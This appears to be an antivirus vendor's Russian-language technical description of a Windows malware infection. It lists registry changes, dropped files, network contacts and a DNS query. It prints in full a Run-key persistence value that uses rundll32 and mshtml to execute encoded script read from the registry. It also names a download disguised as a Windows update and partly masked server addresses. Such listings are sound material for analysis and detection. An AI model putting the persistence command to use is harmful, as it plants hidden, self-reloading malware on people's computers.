Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'ТЕЛО_ВИРУСА'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] ' a' = 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>")'
- '%TEMP%\WindowsXP-KB968930-x86-ENG.exe' /quiet /norestart
- '%TEMP%\WindowsXP-KB968930-x86-ENG.exe' (загружен из сети Интернет)
- '<SYSTEM32>\rundll32.exe' javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>")
- %TEMP%\WindowsXP-KB968930-x86-ENG.exe
- %TEMP%\WindowsXP-KB968930-x86-ENG.exe.tmp
- %TEMP%\WindowsXP-KB968930-x86-ENG.exe
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\WindowsXP-KB968930-x86-ENG[1].exe
- '20#.#6.232.182':80
- 'localhost':1038
- '17#.#9.159.34':80
- 20#.#6.232.182/download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe
- 17#.#9.159.34/q
- DNS ASK do#####d.microsoft.com
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'Indicator' WindowName: ''